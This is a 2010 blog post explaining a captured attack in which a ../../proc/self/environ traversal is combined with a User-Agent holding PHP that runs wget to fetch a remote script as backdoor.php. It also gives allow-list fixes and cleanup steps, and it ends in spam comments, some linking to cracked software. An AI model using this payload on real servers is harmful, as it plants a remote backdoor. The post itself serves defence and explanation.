Friday, June 25, 2010

The proc/self/environ Injection

Event Details


Date
21 June 2010

POST Values
file: ../../proc/self/environ

SERVER Values
HTTP_USER_AGENT: <? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.

The visitor hopes that my code that handles file inclusion is written something like this:
<?php
// Include file requested
include($_GET['file']);
?>


Thus the file that will be included would be:

/var/www/../../proc/self/environ (which equates to /proc/self/environ)

The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:


DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_HOST=www.example.com HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_ADMIN=webmaster@example.com SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)


However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:

<?
// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");
>


Now the hacker can now visit his page and run any commands he wants on your webserver.

http://www.example.com/backdoor.php

How to prevent this

  • Sanitize your inputs
    • Ensure that directory traversal is disabled/checked for
    • Work with an allowed list of files

      $allowed_files = array('file1.php', 'file2.php');
      $allowed_index = array_search($_GET['file'], $allowed_files)
      if ($allowed_index !== NULL)
      {
      include $allowed_files[$allowed_index];
      }


    • Don't allow visitors to specify by name

      $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
      if (!empty($allowed_files[$_GET['file']]))
      {
      include $allowed_files[$_GET['file']];
      }



Threat Level
High

Course of Action

If this has happened to you, do the following:
  • Take the server offline (if possible)
  • Check active process list for unknown scripts and kill them
  • Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
  • Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
  • Remove backdoor scripts
  • Monitor you logs. The hacker will probably return and attempt to reinfect your server.

18 comments:

  1. Some us know all relating to the compelling medium you present powerful steps on this blog and therefore strongly encourage contribution from other ones on this subject while our own child is truly discovering a great deal. Have fun with the remaining portion of the year.
    python training Course in chennai
    python training in Bangalore
    Python training institute in bangalore

    ReplyDelete
  2. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging.
    AWS Training in pune

    AWS Online Training

    AWS Training in Bangalore

    ReplyDelete
  3. Great post. I was once checking constantly this weblog and I'm impressed! Extremely useful information specially the closing part. I maintain such information much. I was once seeking this specific information for a very long time. Many thanks and best of luck.
    samsung mobile service center in velachery
    samsung mobile service center in porur
    samsung mobile service center in vadapalani

    ReplyDelete
  4. nice blog
    get best placement at VSIPL

    digital marketing services
    web development company
    seo network point

    ReplyDelete
  5. I found your blog while searching for the updates, I am happy to be here. Very useful content and also easily understandable providing.. Believe me I did wrote an post about tutorials for beginners with reference of your blog.

    Aws Training in Chennai

    Aws Training in Velachery

    Aws Training in Tambaram

    Aws Training in Porur

    Aws Training in Omr

    Aws Training in Annanagar

    ReplyDelete
  6. Informative and useful article with detailed explanation. Thanks for sharing Angular training in Chennai

    ReplyDelete
  7. Thanks for sharing the detailed content with all of us, keep writing.
    Data Science Training in Pune

    ReplyDelete
  8. If it's not too much trouble share more like that. Monthly Seo Packages

    ReplyDelete
  9. Those Looking for Download Microsoft Office Free find Luck with these Top Searches. You have to see these searches for Download Microsoft Office Free. Microsoft Office Rar

    ReplyDelete
  10. This is completely powerful software that helps it’s users in mainstream. The features of Windows 8 are totally amazing and they works very well. Windows 8.1 Crack Download

    ReplyDelete
  11. “In case you have not made any plans for the weekend yet, it's Thursday. Start planning!” “It's Thursday. I'm breathing. I'm Alive and I'm Blessed. God is Good. Thursday Quotes

    ReplyDelete
  12. I was really impressed by this software. It gives me help in solving problems. that's nice.
    https://thepcsoft.com/icecream-screen-recorder-pro-crack/

    ReplyDelete